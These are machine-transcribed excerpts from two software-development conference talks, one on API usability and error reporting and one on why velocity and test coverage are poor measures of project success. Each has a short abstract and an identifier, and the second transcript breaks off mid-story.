hard. Now, I interviewed quite a few times people that said they knew design patterns. Typically, this is a hint that I have to ask them some interesting questions. That is, okay. What have you read? That is always the gango for book, nothing else. Which pattern have you used? The singleton. Ha, ha. Have you had any problems with that? No. Do you test your code? Of course. How did you do that with the singleton? Ah, yeah, we had to do, you know, this trick in the linking so we could have the singleton for testing purposes. I was like, ah, that was actually not a problem. I know that I think of it. Yeah, it was a bit of, you know. I can make penetability really hard by having dependencies. If you use singletons, yeah, I now use the word singleton for the global state just for the sake of argument. It's just you have a call onto the singleton inside your function but it's invisible from outside. Yeah, so as a user of the API, I don't know that you call something there that is global state. So I may have horrible surprises. And I've had quite a few headaches because of this kind of stuff. Yeah. As I said, all these stuff so far sounds obvious, yeah? Yet how, raise your hand if you have seen applications where there were singletons that gave you problems with testing or concurrency or whatever, yeah? There is plenty of that. So reporting, the next one. This is extremely important for visibility because if things go wrong, I need to know what I can do about that. Yeah? You just need to know how errors are reported, what is reported when, oh, sorry, I clicked one more, and what they can do about them. The code base I'm working right now, the people since they are using C++ and C++, they are using C++. When you throw, you can throw everything, even the kitchen sink. You know, you can throw, in the throw clothes, you can put strings in whatever type you like. They throw char star, which means that if something happens, I have no way to decide programmatically what kind of error was, yeah? Java code dealt with in a previous contract, the guys that work on this framework, wonderful persistency framework for the bank, so they gave out the API that had only one exception that was thrown in all cases, you know, wrong connection error, data error, whatever, the only way to decide what the problem was was parsing the message string. Yeah? So these are actually awful things that can cause incredible trouble, and you can't recover from error easily if you have that, yeah? So actually, with the error reporting, you need to make recovery easy to do. So you can use error codes, possibly, or exception classes, or often a mix of the above, yeah? Sometimes I see exception classes with error codes inside, because, you know, depending what you do, having a forest of exceptions is just as bad as having none, yeah? So there is a matter of balance. But whatever it is has to be easy from a programmatic point of view, yeah? So the user has to be the person, the developer that is writing code with your API has to have a way to take action in case something bad really happens. Yes? These errors, do you throw them in the face of the user? The user in this talk is the programmer using the API, okay? The user in this context is the user of the API, okay? Yeah, you throw them in their face. As I said, text messages are not good enough, yeah? And something that is not clear to many people is that error management and reporting need careful design from the very beginning. The problems I've seen are due to the fact that very often error management is an afterthought. Most of the time I have the same experience. And this is incredibly bad because it can cause trouble in the code using your API. They have to make all sorts of convoluted mess just to understand what is going on there, yeah? Possibly knows implementation details so they know what kind of thing to expect, yeah? And the other thing that is sometimes not clear to many people is that what is an error at one level may not be an error at another one. This is something that confuses the hell out of many people. So if you read the file and the file class tells you throws an exception, say file not found exception at that file class level, that is obviously an error, yeah? So says, well, you told me to read something that doesn't exist. I'm telling you, I cannot do anything, sorry. From the perspective of the caller, might not be an error, might be something that just happens, yeah? We take data from some call that comes from the user, yeah? That made a typo there, yeah? And then it is not really that you report back, look, that you gave me the wrong, the name of something doesn't exist, yeah? If it is a typo, you can't consider that like as an exception at that level. Something that happens here to deal with it, yeah? It's not exceptional in any way, yeah? So the error at that level has a different connotation, okay? Because sometimes people think that whatever exception is at the bottom level has to be, you know, major error that has to be reported all the way through. No, you don't want that. You have to keep in consideration that keeping into account that from the caller point of view may not be an error. So you have to be clear, yeah, about your design there. And then the final thing, incremental design. I put this quote from Fred Brooks. Every who of you knows about Fred Brooks and read this book, The Mythical Manmunt. Okay, so he is often quoted for, you know, saying, talking about clean architecture design. The interesting bit is that this quote is not about the internals of the system, it's about the APIs exported, yeah? I will contain that conceptual integrity is the most important consideration in system design. It is better to have a system omit certain anomalous features and improvements, but to reflect one set of design ideas than to have one that contains many good, but independent and uncoordinated ideas. So we often use the conceptual integrity to talk about the internal architecture of our systems, yeah? But here, what Fred Brooks referred to is like from the outside point of view. He was the project lead of the IBM 360 operating system, yeah? So basically his users were programmers, yeah? Now when we talk about API design, we always talk about flexibility. We need to be able to do everything, yeah? You need to do this, ha, my API can do that. You need to do that, completely different. We can do that as well. Yeah, my suggestion is start specific and small and be focused, yeah? Start with the 80% case first. And also I would say, remember that when you talk about API software and they're associated the word framework, framework means that there are frames around it. Frames put some constraints, yeah, to what you do. A framework is made to limit your choices, not to extend them, yeah? Quite a counterintuitive thing, yeah? But if you do that, actually, you'll be in a much better position because it's actually easier to extend your API later on. Because if you start big, we need to solve this problem and that problem, then you think oh, okay, then we make it flexible, but flexibility is not truly flexible. It's flexible in a specific direction. If the changes go into a different one, you have a problem. How many of you have dealt with the flexible frameworks, possibly written by you or by teammates or your project that the flexibility ended up being something that was just dead code to carry on and maintain? Yeah? So I'm suggesting it's always start specific and small, you have more options later on. When you know more, you know in which direction to actually add stuff, yeah? It's easier to add than to remove always. And you are not going to need it anyway, you're going to need it anyway. You are very bad at predicting what you are going to need later on. Of course, sometimes we know that something is absolutely necessary. I'm not saying that is always the case. So if we know that, we do that, yeah? But most of, very often we just don't, we guess. Then there is the caveat, I mentioned before, sorry, that public APIs are more difficult to reflect on. In fact, some errors may actually become features. Think about Excel. I don't know if any of you have done any programming with Excel. Because an interesting concept of date, so the dates are integer from, I think it's the 31st of December, 1899. But then there is a bug in Excel that they thought that 1900, I think, was a leap here. And basically this screws up the whole thing. So everybody knows about the mistake. So all the code is written around that bug when they have to deal with dates in Excel. That's a feature. If they fix that, they will break tons of code. Yeah? And you can change them. But the techniques to reflect are usually involved some form of deprecation and versioning. So it can be quite a complicated affair. It's not really a quick feedback loop of a few hours. It can be months, years. It can be a very, very long thing. Yeah? Or you can choose the C++ way that you just pile up craft on top of craft and keep everything. Yeah? And now that you have some time, six minutes, so I wasn't sure if I could get to this point or not. But yeah, I want to show a couple of studies that are, you know, they also, they have quite something that surprised me in a way. The first one is the factory pattern. How many of you do Java in this room? C-sharp? How many of the APIs use involve some form of factory to instantiate stuff? Now, I've seen, I have a more limited experience in C-sharp than in Java. And Java certainly, it seems that is, if you have an API without a factory, you know, you are not cool. But according to this study, the factories are detrimental to usability in several situations. I put a reference to the study also in the slides. You can download it from the web. And actually, the constructors are much better. Now I have to say that personally, my personal experience, I agree with this. I didn't do the study, but I always find it awkward to work with factories also because often they involve factories or factories. You know, you go to the meta, meta level is like what the hell, I just want one of these. Sometimes even if they reduce usability, you still need them for various reasons. You know, you don't want to expose some things. But often you can do without. So it's basically, if you are writing something that involves factories, take a step back and see if there are other ways to get around the problem. And then there is another one that is even more surprising for me, the constructors. Apparently, according to this study, programmers strongly prefer and were more effective with APIs that did not require constructor parameters. So basically construct without parameters and then set properties later. Which I found a bit odd. Yeah? I did the study, so maybe I need to read it again to see if there are any caveats in the way they did the study. But I find this very interesting. In this case, in my opinion, it doesn't really matter what they say, I would still go with a constructor and the parameters because it's easy to forget setting stuff. And then if you find yourself, you know, construct, set, set, set, construct, set, set, you say, you know what, I'll put a factory in. And I say, now I have two problems. But, you know, these are kind of surprising things when I was researching from material. I wasn't really expecting this stuff. I don't know, especially in this one, why, but apparently it's like that. And nowadays also with the ideas I don't think is actually that problematic anyway. You can only see the parameters there with the autocompletion. That said, I'm done. Any questions? Questions, remarks, these are links to all the resources there and then there are also some books I suggest. Yeah? But have you got any questions or remarks or even something that contradicts whatever I've said? Yes. Yeah. But still, yeah, you can do that. Yeah? So we said the example is a startable and stopable thing. Yeah? Said instead of throwing, you just ignore it if you're already started. That solves the problem of the exception, but introduce anyone. How do you know that it started? You know, basically what you end up doing is any part of the code where you need the thing to be started, you will start it all over the place. Because it's like, I'm not quite sure here if it is in the state in which I want. So you know what? I make sure it is. Which will make your successive refactoring actually quite hard. Sorry? Restart method. Yeah. Well, I have seen in the refactor example. So basically the refactor example is a potential. Yeah, is what we did. Yeah? It was like, it was a better solution. I'm not saying that there is a best solution. But the whole point was that if you have something like this, you want the programmers, the fuselage API to be able to do something with it, to take decisions. If I start it, I want to be able to say, well, is it started? Can I, I want to be able to stop it? Yeah? Without recurring to strange tricks. Yeah? This was the point there. Then you can solve the problem, maybe in many other ways. Yeah? That my solution was an example of a solution. Okay? Any other? Okay. Thank you very much. Time for coffee. No problem. Perfect.
|
Programmers, explicitly or implicitly, when working on complex systems, end up designing some APIs to accomplish their tasks, either because the product itself is some kind of general purpose library or because they need to write some libraries and packages to put some common code of their applications. There is plenty of information available about how to write clean and maintainable code, but not a lot about writing usable APIs. The two things are related, but they are not the same. In fact, clean code is code that is clean from the point of view of its maintainers, usable APIs, on the other hand, refer to code that programmers (other than the original author) find easy to use. We’ll see how usable APIs help in writing clean code (and vice-versa). In this session I will introduce the concept of API usability, explain its importance – e.g., impact on productivity and defects – and show its relation with clean code, as well as some (sometimes surprising) research results from literature. I will also give some practical advice on how to start writing more usable APIs.
|
10.5446/51421 (DOI)
|
I guess we start. Hello, thanks very much for giving me one hour of your time. What I'd like to talk about today is a very painful personal experience of mine, how I kind of lost almost all my money, and where I was a city of a startup a couple of years ago, and because it was completely under our control, we could do everything we wanted, which was brilliant. All of a sudden there was no politics, there was nobody telling us we can't do more tests or we can't do continuous integration because there's no money for a server. We could do anything we wanted. I hired ten people who I've worked with, some of them I've worked with before for years, they were one of the best developers I've worked with, the other people we hired were incredibly smart. We did everything that people talk about at conferences like this. We did short iterations, we did continuous deployment, we did everything that was tested in an automated way. We were very, very smart in the way we approached things, and then kind of somewhere in the summer of 2009 the company ran out of money. Then really bad things started happening. I've realized that although we were very, very, very, very smart in doing lots of this stuff, we weren't really smart at all. That's what I want to talk about today. I assume most of the people in this room are going to be developers because it's kind of a developer conference. Hopefully there's a couple of product people and things like that. This is mostly my journey and my eye-opening moments as a developer when I discover that what we think is smart is not always the smartest thing to do. Maybe I'll challenge a bit of your thinking as well. For example, I was traveling, I travel a lot on the planes and I was traveling to Vienna two weeks ago and on the plane there was a really nice girl sitting in front of me and there was a British guy sitting next to her. Do we have any Brits in the room? There's one. Okay, so I can slug Brits of them. The British knowledge of geography is legendary. They don't know the difference between Austria and Australia and everything that's outside of the island is foreign. That's where they speak foreign. This British guy that was sitting in front of me was kind of hitting on this girl and I heard them speaking. He was saying, oh, where are you from? And she said, I'm Brazilian. He said, oh, Brazilian is my favorite language. But he made himself look like a complete fool in my eyes, but by the end of the flight he got her number, they went out together and, hey, you know, Brazilian is his favorite language. So although to me that looked completely stupid, obviously there was a method to that. So some of the things I'll talk about today might sound completely stupid and they, you know, when I started looking they did sound completely stupid and obvious, but hey, they said I made the full out of myself and maybe I'll prevent some people here doing that. And one really interesting thing these days is that software is everywhere. We have one. We are in absolutely all the industries everywhere. We are controlling everything. NSA is pying on us as we speak. And I've read some statistics in 2004 apparently according to this research, companies in European Union alone, lucky for Norwegians you're not part of that, but companies in European Union alone have wasted 140 billion euros on failed software in that one year. So, and I'm sure for a lot of those projects people declared success and victory like we did because, hey, we have all the tests are passing, you know, we have fantastic test coverage or maybe not, but kind of even declaring victory there is kind of a very interesting thing if we as an industry lose 140 billion a year only in Europe. And I realized kind of when we lost all the money as a company, I realized that kind of we are declaring victory too early and we're declaring victory and completely the wrong things. When we say we are done, we are far, far away from being done. Lots of people when I speak to as a consultant when I start working with them, we find a scramble that is done and then done, done and then there's often a done, done, done which kind of puts people into several levels of doneness. If you Google for done, done, done, done, there's about 20,000 results which is kind of a bit alarming. But as an industry we are very bad defining what done actually means. And I think as we are now everywhere, that becomes more and more obvious. But people often say that, you know, this is because IT is an immature industry, it's where, you know, we have not matured yet as an engineering discipline, we need more engineering, we need more science and crap like that. I think that's not true because other industries have been failing horribly badly like that for hundreds and hundreds of years, even when they were pretty mature. And I think there's a lot of stuff we can learn from other industries to prevent ourselves from doing that. So kind of when we lost all the money and I was left without money to pay the rent next month and I had to go back to consulting urgently, I started kind of trying to figure out how could we have been so clever and so stupid and then discovering that this is not just an IT problem, people have been messing up like this for hundreds and hundreds of years. So I started kind of looking for solutions in other parts of the world and other industries. And one really, really interesting thing I found was this fantastic Swedish government project that was done a couple of hundred years ago. That's an amazing story, absolutely amazing story. Done at a time where ship building that was relatively mature industry was going through the same kind of shift we have now with kind of cloud based and on-site deployments. So you can almost tell that story again and you know tell it about an IT company and what they were doing is it was just about the time when ship building was moving from on-site to cloud. What I mean by that is before that ships were typically built to get lots of people with lots of kind of spears and swords and guns on and then what they would do is they would ram one ship into another, couple of hundred people would jump and kill everybody and that would kind of be the battle. And at that point in time it was just becoming possible to put lots of cannons on a ship. So all of a sudden you had this kind of cloud based deployment. You could shoot people from afar. And this kind of government project was quite interesting because the key sponsor for that was very, very politically charged. The key sponsor was the king of Sweden. And Sweden was an up and coming kind of power then and he wanted to build a really, really powerful ship. So the problem with that is he couldn't decide whether he wanted a cloud based deployment or an on-site deployment. So he kind of changed the requirements all the time. And because this was a very, very politically charged situation he'd changed the specs himself. It's like the customer telling you, no, no, this is what I want. No, that's not what I wanted. I told you do this. And then the ship was kind of made longer and shorter and longer and shorter. Then more cannons, then less cannons, then kind of the day before the ship actually set sail. The key business takeover they decided, we want more cannons, more cannons, more cannons. So they put a bit more cannons on the ship. And the ship is famous for kind of setting sail in the morning with this kind of big launch thing and then sailing about one and a half kilometers and sinking. It's called Vasa. It's an amazing story. And kind of the ship shipped literally like we ship software, but kind of even more literally than that. But it didn't ship very far. Like our software kind of that we built in that startup, we shipped. It was really good. It's on production. Hey! But it didn't ship very far, unfortunately. And this is the real problem. We declared success at the point when our ship was there. And kind of it got there and turned over because there were too many cannons on the front of the ship. And yeah, we were still successful. We were doing good. We were one of the best teams. And we had the TDD continuous deployment and stuff like that. And that's how we measured success. So kind of that's what I started looking for stuff like why do we end up in this situation? Why do we have five levels of doneness and address it from lots of different perspectives and how do we stop doing that? And I realized that the way we were planning things was causing us to do that. And the way we were planning things, if I was cleverer then and changed that way very, very slightly, we would have been a million times more effective. And since then I've kind of applied this with a couple of companies and it works like magic. So maybe I can inspire you to change your thinking slightly and ship rather than ship. So kind of the way we were planning things is kind of the default way of how people plan today. It's kind of user stories very much like this one. I'm sure everybody's seen something like this. And kind of these user stories describe the role of a person trying to do something, what they're trying to do and kind of what they want. And we'd mark things done if when that goes live and all the tests pass and everything. So we measured success the way most people measure success. We measured success by looking at bug trends. This is not from our system. It's one Jira screenshot I particularly like because this thing here has been critical for four weeks and five days and nobody cares. So we looked at bug trends. We looked at bug statistics. We collected a lot of the information like that. We marked things as priority one, two, or three, critical one. This is what a lot of people do these days. I assume many of you do something like that. And kind of what we also did is we had lots of tests. So we wanted to make sure that our test coverage is good. And one of the criteria for our success is kind of test coverage is good. And this is kind of again not a screenshot from our team but a really interesting one because you know here you have something like 97.36% coverage and on the other hand is 33%. There's a big variance in this. There's lots of numbers. And I've seen people be overly obsessed about those numbers. I've worked with people where there's a policy that the test coverage has to be more than 90% or something like that. And then what we did is we'd collect all that information because this is just not enough information. We don't have enough numbers here. So we'd collect that more and create dashboards like this. And again, this is a screenshot they found online and it's one I really, really like because we had similar dashboards like this but not as bad as this one. This has 10,078 violations. Most of the major and nobody cares about that. So lots of very interesting information there. What we also did is we did something that people today are overly obsessed with. And we were completely obsessed with that. And what we did is we would measure the success of our team and the performance of our team by measuring story points and velocity. I see people nodding in this. So lots of you do that. And that was our measurement of success. It's like we are delivering 70 story points. Hey! Fantastic. So the interesting thing about all these metrics including story points is they are all negative metrics. Negative metrics can tell you that something is wrong but they cannot tell you that something is right. For example, a very high bug count can tell us that something is wrong. If I have 500 bugs in the system, I know it's not good. A very low bug count doesn't give us any information. That might mean it's not been tested. That might mean people who tested it don't know how to test it. That might mean we didn't understand the level of risk. That might mean, hey, you know, it was superficial and stuff like that. So it doesn't give us any useful information. Test coverage is the same. Very low test coverage is telling us something is wrong. A very high test coverage isn't telling us anything. I've worked with a couple of banking clients where because they have the policy that everything has to go over 80% and the build system, the version control would refuse to accept changes that take coverage below 80%. People started writing lots of tests without any assertions, which kind of completely defeats the point. So negative metrics are dangerous because they lead us to a wrong path. For example, blood pressure is a very good negative metric of human health. Very high blood pressure is giving us useful information. If I have a very high blood pressure, something's not good. I can reduce blood pressure immediately by cutting my head off. That is not going to make me healthier. And a lot of the teams I've worked with do that all the time. They take a negative metric and they optimize it. They look at the number of bugs, they optimize the number of bugs, they optimize code coverage, or they optimize velocity. Velocity is a really strange one because people perceive velocity as a positive metric while it's not. So for example, this particular picture is from rapidscrum.com. You can go and find it there. Rapidscrum is a website by one of the kind of leaders in the Scrum community. And this particular picture is showing my space transformation to Scrum. What it's telling us is this kind of whole thing about Scrum hyperproductivity. And this particular picture is this line above is the MySpace hyperproductivity. What it's telling us is that after transforming to Scrum, MySpace became 800% hyperproductive. Now when you tell that to somebody, that sounds good. Who here is using MySpace? Okay. So the fact that they are 800% hyperproductive is irrelevant. Absolutely irrelevant. Here's another kind of example. So let's say we are here in Oslo and you look like somebody from Norway. Okay. So where do you live? Oslo. No, that's wrong. You live in Christiansund now. You're my volunteer. Yeah. So I don't know why you live there, but that's okay. So by the way, doing this thing on Google, I found a really interesting typo there. You see, Ken, he says this route has tolls. And being Norway, I'm sure what they wanted to say is this route has tolls. Given where we're going. But so anyway, so my friend here, what's your name? Una. Una lives in Christiansund. And he tells me, like, you know, come and visit me there. And I know from Google that this is almost 600 kilometers and it's going to take me seven hours running away from trolls most of the time. And because he doesn't want to wait for me for seven hours and this can be seven or eight or nine, depending on whether trolls catch me or not. We have an agreement that when I get close to kind of Christiansund, I give him a call. And about three hours later, I call Una and say, Hey, I'm in Christiansund. It's taken me three hours, 49 minutes with three hundred two kilometers. Is that good or bad? It's unexpected, but is it unexpectedly good or bad? So I'm in Christiansund. And because we're agile, we just replanned it and it's just one letter. What was the problem? We arrived there earlier. We're hyper productive. I'm 300% hyper productive here. So the problem with velocity, if you look at velocity as a physical measure, like in physics, velocity is a vector. It's not speed. It's direction plus speed. And what we call velocity in software is just speed. We have delivered 70 story points this week. Fantastic. Good. Next week, we're doing 80. We're much better. At the same time, you know, we could be going to Christiansund, not Christiansund or whatever that kind of I don't even speak English correctly. So I'm not even going to try to pronounce this. But that's the real problem just by looking at velocity. We cannot decide if we're doing well or not. We can decide that we're not doing well. It's a negative measure. If I'm moving at 10 kilometers an hour, I know something is wrong. If I'm not moving at all, I know something is wrong. If I'm going on the route 70 kilometers an hour, I cannot say that I'm right. There's information missing there. And the problem what we do with this with story points, with functional points, with kind of the way we measure software delivery is we declare victory and velocity. And that's really, really dangerous because it's a negative metric. And we try to optimize a negative metric. So Forester Research last year published this report that talks about how companies actually do agile. And what they say is that lots of people adopt agile practices only for development. They leave the business decision making process out of it and they leave the kind of follow up business process out of it. That's not in scope. And what people do there is they create a really, really effective engine, efficient engine. You replace a Trabant engine with an eight cylinder diesel thing from, I don't know, a BMW and it can go really, really fast. It delivers lots of story points. But nobody knows whether kind of those story points are actually useful or not. And because they don't know that, there's this big decision making up front that left out of the agile process. That's this kind of marination process at the end. And Forester Research called this way of adoption, waters come fall. What they talk about is how kind of, if you do waters come fall, you're not really getting the benefit out of the engine. You have a really fast car, but it's just going around in circles. And what kind of, that's kind of what we were doing. And I want to make you think about that really hard if you are in that same situation. And if Forester Research is correct, most of the people in this room will be. And give you some tools how to escape that. So, the critical problem there is that when we do software projects, people pay for software projects or software products because they want some business outcome. And what we end up planning and negotiating is a bunch of stories or a bunch of features, a bunch of use cases, a bunch of requirements. It doesn't matter how we slice stuff. And kind of what we need to get to is start delivering this instead of delivering that. And in order to do that, we need to start planning differently. And the key problem with that is that the way we describe plans, the way we describe roadmaps, this is a screenshot from the Adobe Cold Fusion roadmap, the next generation of confusion. And I'm not speaking on Adobe in particular. I think this is typical at least of the way lots of people do roadmaps these days. And if you look at the URL, it says Cold Fusion Roadmap. What this is, is actually, it's not a roadmap. It's a sequence of things. It's supporting the waters come for thinking. We have a sequence of things we need to deliver. And then you children can go and play your scrum and deliver that in cycles. But this is what we need to deliver. And the downside of that is that in today's age, the market opportunities change quite a lot. By the time we deliver this, the market has moved. And now we have this really, really fast engine that can move really fast. But we are not really using it to get the benefits out of learning and incorporating learning through delivery. Because even if people do use the stories, they do kind of milestone planning that is a sequence of things on a larger scale. And we call these things roadmaps. I will try to convince you today that this is horribly, horribly, horribly, horribly wrong. So this is kind of generally what I've seen people do is take a roadmap like that and then start creating this high-level product backlog and then start pushing user stories, lower-level stories into scrum or XP or Kanban or whatever, and then out comes a potentially shipable product increment. This is the way most people understand scrum. This is the typical scrum picture. And it's very important that they don't get misunderstood on my next sentence. I do not want to say that this was the original intention of scrum. But this is how people understand it from my experience is the scope of scrum is this part here. This is beyond the scope of scrum. This is beyond the scope of scrum. And then we get this water scrum fault-thinking because this part here is let's make a roadmap decision for six months up front. And this part here is, yeah, yeah, it's potentially shipable. Let's marinate it for a while until it improves. And then we can see what we're doing. Because of that, software teams declare victory here. Now that's very, very dangerous because we can end up putting more cannons on a ship and shipping it. And then the ship turns over. So kind of the problem with that is that it stimulates linear thinking because apart from this part in the middle, the developers are concerned about if you go and talk to the people who make really important decisions, they see this thing as I put something into the sausage factory here and out comes the sausage at the end. It's kind of linear. And this linear thinking promotes what Jim Shore in 2005 called story card hell, where people create 500 user stories that they can kind of put in JIRA and forget about them and then index them and then manage them and then replan and stuff like that. And that kind of creates this whole set of linear thinking. We're better with user stories than we were with big upfront plans because at least we don't waste time detailing everything, but we still promote linear thinking. And whenever I see something like that, that reminds me of kind of big Russian Soviet era government death marches like this one. There's also kind of a very linear stream of people carrying stuff out. This is actually a picture of a famous project called the White Sea Canal. So White Sea Canal is a famous death march that was organized early on during the kind of Soviet big planning kind of era where they decided that what they really need to do is dig a canal from the kind of Arctic sea down to Leningrad because they figured there's some lakes in between and although the distance is about 300 kilometers, there's only about 40 kilometers of canals you need to dig between the lakes. And this is a fantastic project and we're going to put lots of really enthusiastic political prisoners to do that. And this was a project implemented by about 200,000 people out of which about 17,000 have died a proper death march. They have dug the canal. It was a glorious victory of the Soviet Union. Even today about 70 years later, the canal is useless. It is useless for two main reasons. Reason number one, the water is frozen for six months a year. It's a White Sea Canal, ice. Reason number two, when they started digging in a couple of places, they've hit really, really hard rock and they could only dig about three meters. So even when the water is not frozen, you can get like a very small sailing ship to go through but nothing really serious. So from any kind of commercial perspective or military perspective, this is useless. It was a glorious victory where people kind of succeeded in delivering this. And if they tried to kill 17,000 people, I think it was a good victory. Apart from that, I don't think they've achieved anything. And kind of, well, this is kind of quite extreme. One really interesting thing about this one is this project had a very, very vocal opponent, a guy called Peter Paltzinski. Peter Paltzinski is a fascinating figure. I strongly recommend googling about him and reading everything you can to read about him. He invented Lean Start about a hundred years ago. He was an engineer that kind of figured out that lots of these projects fail because they have three dimensions nobody thinks about. One is a local dimension. You don't know that when you start digging through 40 kilometers, you're going to hit a really hard rock that gives you only three meters. The other one is a human dimension. You don't know that kind of people are not going to be that keen digging in really cold weather. And they're going to try and fudge it as much as they can, especially if they're prisoners. And the third dimension that he said people don't often think about is a time-based dimension, where as you start working, the opportunities change. And this fantastically reflects today's software ecosystem. If you read Lean Start up, that's what they talk about. So Peter Paltzinski came up with these three principles that you can read about in a book called Adopt by Tim Harford that has a subtitle, Why Success Always Starts with Failure, which is quite an interesting book. And he defined these three principles basically to help plan better. The first principle was try out lots of new things. Figure out kind of what you can try and try out lots of new things. And then the second principle is try to do these experiments on a scale where you can afford to fail. Don't run out of money. Don't get into a situation where you can't pay rent next month. And the last principle is figure out what worked when you try things out and keep the things that worked. Things that didn't work kind of discard and move on. And this is how you can adapt to lots of these dimensions that people don't currently plan for upfront. It's impossible to plan for these things. You need to kind of bake in this thing in the process to be able to kind of survive in an environment like that and be successful. And if we look at these things, this is kind of lean startup invented 100 years ago plus one more important thing that kind of businesses are obsessed with these days that's called design thinking. Design thinking is this kind of business management and project management thing that was first used in the design community to design new products and then taken over by the business. Stanford Business School has a school for design thinking now. It's becoming really popular. And design thinking talks a lot about analysis. And they talk about analysis in an eye-opening way for me. Because most of the time when we did analysis, we take a user story and we analyze a user story. And what they say is that's not analysis because you have only one option. You don't decide anything useful. You analyze that one option, you do that one option. What analysis should be about is choosing between options, what Peter Pachinski talks about. So kind of design thinking has this kind of two thinking phases they talk about when you have to be in a divergent thinking phase where you create lots of options. And then you do analysis here in the middle to choose options. That's how you become successful. So kind of, and this is the interesting thing where kind of Pachinski says, you know, we need to get this feedback out and things like that. And this is why if you look at something like this, this isn't a roadmap. It doesn't have options. It's not a useful high-level plan. If you think about roadmap, the words here, it's not a roadmap. It's potentially a road. It's one way of doing things. And in fact, it's not a road. It's a tunnel. You go in on one end, then you kind of do your sprints in the middle. You go out on the other end and then you figure out where you are or maybe not even then. So that's a tunnel. It's not a roadmap. This is a roadmap. It's very simple what a roadmap means. It's a map of roads. It has lots of options. If I'm here and I need to get there, I know that this is my preferred way of doing things. But if that road is blocked, there's plenty of different options. And I can take this road. I can take that road. I can look at this thing and, you know, if I wake up in the morning and for some insane reason this road isn't congested, I've never been in Oslo where that road wasn't congested. But if for some insane reason that road wasn't congested, I can step on the pedal and go really fast. I can use my engine. So kind of what I've realized is we need to be much better in software creating roadmaps like this because then they would allow us to apply Paltransky principles. They would allow us to kind of consider all these dimensions that people don't think about. And going back to kind of this, I realized what we really need to do is we need to do something like a GPS. So about seven or eight years ago before I bought my first GPS, the way we used to plan trips is we would pull out a large map, we'd figure out exactly where we want to go, and then we would get into a car and I would argue with my wife all the trip where kind of one of us would be reading this map and saying, oh, I don't know where the, so I think we missed it. Did we miss it or did we not miss it? And kind of we'd have to argue and stuff like that. Now, I have a machine that tells my wife she doesn't know how to drive. She's really good. I do not have to have a divorce. You know, there's somebody else arguing with my wife. But more importantly, when we miss a turn, it's immediately clear that we missed it. Plus, we do not need to stop. We do not need to pull this. What will typically happen is after half an hour we'd say, yeah, this doesn't look like we're going the right direction. Then we'd get out, we'd stop, we'd come down a bit, have a coffee, and then say, okay, let's ask somebody where we are, and then start replanting again, and then do the same thing. So with the GPS, we don't have to do the GPS. First of all, it recognizes when we're off our route. And the second thing is automatically comes up with another option. Now, with a really fast engine that we have, without a GPS, that's not that useful. With a GPS, that becomes incredibly useful. So the question is, how do we create a GPS for our projects? How do we create a GPS for our products? How do we create something that allows us to re-plan very quickly, that tells us when we're not on the route, that argues with the project manager on its own. So we don't have to fight with them. And there's a couple of really interesting things that the GPS has. GPS has a map with lots of options. So first of all, we need to start creating plans that have lots of options. The second thing the GPS does is the GPS shows in more detail something that we're close to. Shows us more options about something that we're close to. Doesn't too much care about the options that are farther away. The third thing the GPS does is kilometers per hour. That's fine. We have velocity, good, useful measure to figure out how we're stuck. Is there a troll on my car? But GPS also has two pieces of information we do not have now. And that's what does the next turn look like exactly so I can spot if I've missed it. How far away is my next turn? So I can kind of decide if I've gone too far. And it has the distance to its destination and the time when we're expected to arrive. Now, what I want to challenge you to think about, and I don't really have a good solution. I can tell you what I've done. I don't think it applies to everybody. But I hope to challenge you at least a bit to think how would you define those two pieces of information for you? Because they're very important. If we can do that, we can create a GPS. We had to redefine how we plan. Because if you look at this part of Palschinski's principles, that's kind of where it all succeeds or fails. Seeking out feedback. How do we know that we have made the next turn? How do we know that we've not made it? And again, I hope I've convinced you that velocity is not the way to do that. That passing tests, a low number of bugs and things, that they're not a good way to do that. They're just negative metrics. The question is what do we decide on? And if you look at a typical user story, a typical user story has this part here that is kind of the businessy thing there. But the problem with that is there's no victory condition on it. Because before this user story even went into the plan, this person was able to monitor the inventory. He could go to the warehouse. He could see boxes. He could ask people. He could phone them. He could look at the legacy system. He could look at the paperwork. This person was able to monitor the inventory. After the user story is delivered, this person is also able to monitor the inventory. There is no victory condition there. And that's why we measure success with story points. That's why we measure success with tests. That's why we measure success with bugs. Because there is no victory condition there. And one really, really interesting parallel to this, I told you we can learn lots from other industries, is I looked at this really interesting book by Robert Brinkehoff, who talks about his light bulb moments on wasting millions of dollars for hiring people to do training. Robert Brinkehoff was in charge of a large training department in a huge American kind of company. He had millions of dollars of budget a year to spend on training. He would spend that, of course. And he realized after a couple of years, well, you know, every year we spend a few million on this, we're not really making that much more money. We're not making 10 times more money. If all this succeeded, if we trained our people to be this much better, why are we not 50 times more successful? And he realized this same thing. He realized there's no victory condition attached to it. People measure training by kind of ticking the boxes like, were you happy with this training? Was it a good use of a time? Yes, of course. It took two days of work. Was the trainer knowledgeable? Well, how do I decide? I have no idea what he's talking about. Probably, yes, he had the mustache and everything. So what Brinkehoff figured out is all that is irrelevant, even if people hated the training, even if the trainer didn't have a mustache, even if people said it was a waste of their time. But when they came back, the company makes more money, that's a good training. And we should do more of that. So he started thinking about, well, what we really need to do is think about not behaviors, not the way people do stuff. We need to think about changes in those behaviors. That's the light bulb moment for Brinkehoff. That was kind of my brain exploded when I realized what he said. It took me kind of two readings of his book to figure that out. But what he was basically saying is this user story is bad, and you should return it back. And you should ask a question, how differently is this person going to monitor the inventory after the user story is done? Faster. Okay, now we have a victory condition. How much faster is faster? Twice as fast, three times as fast, ten times as fast. What this opens up is an opportunity to actually decide have we succeeded or failed? Have we made our next turn? This is the next turn. This is what the next turn looks like. This is how far it is. If it's 10% faster, have we made this guy do this 10% faster? Or have we missed it? This allows us to compare user stories. If you have 20 user stories about this thing, and the first two get us there 10% faster, we do not have to do the other 19, the other 18. We have reached the destination. If we do this user story and the guy is actually doing it slower, we are going in a completely wrong direction. We should drop the code, drop the tests, and go back to what we used to do. So that's kind of a critical eyeball moment for me. But what Brinkhehoff also said is that's not even enough because not all behavior changes are good. Not all behavior changes are leading you into the right direction. Not all turns are good. One brilliant example of that is the Hoover Free Flights promotion. Hoover Free Flights promotion is remembered in the history of marketing as the worst marketing campaign ever. Vacuum cleaner manufacturer Hoover in 1991 had lots of old equipment in their warehouses in the UK. And what they decided to do is try and sell it off to make space for new equipment. They went to the marketing department and said, here's a problem for you. We want to clear out the existing equipment. We don't care if we make a slight loss. As long as we clear out the warehouses. And the marketing department said, okay, well, if you don't care about making a slight loss, let's give people something for free. Everybody likes freebies. So for example, you buy a vacuum cleaner, you buy 100 pounds worth of vacuum cleaners, you get a free airplane ticket anywhere in Europe. We're going to make a slight loss, but you're going 